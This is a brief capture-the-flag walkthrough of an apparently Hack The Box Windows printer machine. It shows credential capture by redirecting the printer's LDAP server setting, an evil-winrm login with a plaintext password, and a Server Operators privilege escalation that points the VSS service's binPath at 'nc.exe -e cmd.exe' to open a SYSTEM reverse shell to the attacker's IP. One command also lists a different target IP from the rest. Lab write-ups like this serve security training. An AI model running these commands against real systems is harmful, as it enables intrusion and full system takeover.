Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.108
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have a lot of port here, but we're only going to need ports LDAP TCP 389 and HTTP TCP 80. Navigating to http://10.10.11.108 gives us a Printer Admin Portal. Going to Settings, we see a method of getting credentials back by changing the server to our TUN0 IP address.
In a moment, we get back LDAP credentials:
We should be able to evil-WinRM to the Printer:
evil-winrm -i 10.10.10.233 -u svc-printer -p '1edFg43012!!'
Now, we can run 'net user' to find what groups the svc-printer user is in. One of them is Server Operators which has elevated permissions to stop and start services. All we need to do is modify a service binary and we can get a reverse shell as SYSTEM. This is going to be an easy one!
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 1234"
sc.exe stop vss
sc.exe start vss
Once the first connection comes in, immediately run:
C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 1339
if we don't the shell will drop.
Every one of "The service did not respond" messages is a connection dropped, so definitely run the second netcat connection if you want a stable connection.
Grab both flags and this box is done!